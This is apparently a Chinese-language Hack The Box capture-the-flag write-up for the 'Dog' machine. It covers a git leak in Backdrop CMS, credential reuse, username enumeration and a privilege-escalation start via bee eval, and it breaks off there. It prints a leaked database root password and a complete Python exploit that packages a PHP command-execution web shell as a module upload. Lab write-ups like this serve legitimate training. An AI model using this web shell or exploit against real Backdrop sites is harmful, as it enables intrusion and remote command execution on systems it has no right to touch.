HTB-Dog

git泄露

利用rustscan进行扫描 22和80端口开放。

访问80端口发现是一个 Backdrop CMS，扫一下后台，发现是一个git泄露。

利用Githack进行一波扫描，在settings.php中发现mysql的用户名和密码。

mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop

通过信息收集，能发现它是一个1.27.1版本的。

1.27.1版本RCE

在exploit中，能找到一个RCE的利用，但是得先登录进去才能进行利用。

https://www.exploit-db.com/exploits/52021

https://github.com/FisMatHack/BackDropScan github上找到一个爆破用户名的脚本

python3 BackDropScan.py --url http://10.10.11.58 --userslist /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt --userenum

密码就是上面找到的mysql的密码

这里的话它zip不能上传，根据要求我们可以改成tar形式的，然后上传。

import os
import time
import tarfile

def create_files():
    info_content = """
    type = module
    name = Block
    description = Controls the visual building blocks a page is constructed
    with. Blocks are boxes of content rendered into an area, or region, of a
    web page.
    package = Layouts
    tags[] = Blocks
    tags[] = Site Architecture
    version = BACKDROP_VERSION
    backdrop = 1.x

    configure = admin/structure/block

    ; Added by Backdrop CMS packaging script on 2024-03-07
    project = backdrop
    version = 1.27.1
    timestamp = 1709862662
    """
    shell_info_path = "shell/shell.info"
    os.makedirs(os.path.dirname(shell_info_path), exist_ok=True)
    with open(shell_info_path, "w") as file:
        file.write(info_content)

    shell_content = """
    <html>
    <body>
    <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
    <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
    <input type="SUBMIT" value="Execute">
    </form>
    <pre>
    <?php
    if(isset($_GET['cmd']))
    {
    system($_GET['cmd']);
    }
    ?>
    </pre>
    </body>
    </html>
    """
    shell_php_path = "shell/shell.php"
    with open(shell_php_path, "w") as file:
        file.write(shell_content)
    return shell_info_path, shell_php_path


def create_tar(info_path, php_path):
    tar_filename = "shell.tar"
    with tarfile.open(tar_filename, 'w') as tar:
        tar.add(info_path, arcname='shell/shell.info')
        tar.add(php_path, arcname='shell/shell.php')
    return tar_filename


def main(url):
    print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit")
    time.sleep(3)

    print("Evil module generating...")
    time.sleep(2)

    info_path, php_path = create_files()
    tar_filename = create_tar(info_path, php_path)

    print("Evil module generated!", tar_filename)
    time.sleep(2)

    print("Go to " + url + "/admin/modules/install and upload the " +
          tar_filename + " for Manual Installation.")
    time.sleep(2)

    print("Your shell address:", url + "/modules/shell/shell.php")


if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python script.py [url]")
    else:
        main(sys.argv[1])

在home目录下发现两个用户，其中在johncusack用户下发现user.txt 没权限查看，看来得转换用户，猜着这里是ssh登录的，之前的数据库密码也是ssh登录密码，发现是可以的。

bee提权

提权的话利用bee进行提权。

看一下bee的用法。

Usage: bee [global-options] <command> [options] [arguments]

在这个command中有一个eval 能执行php代码。

然后这里的-options用–root指定一下网站根目录。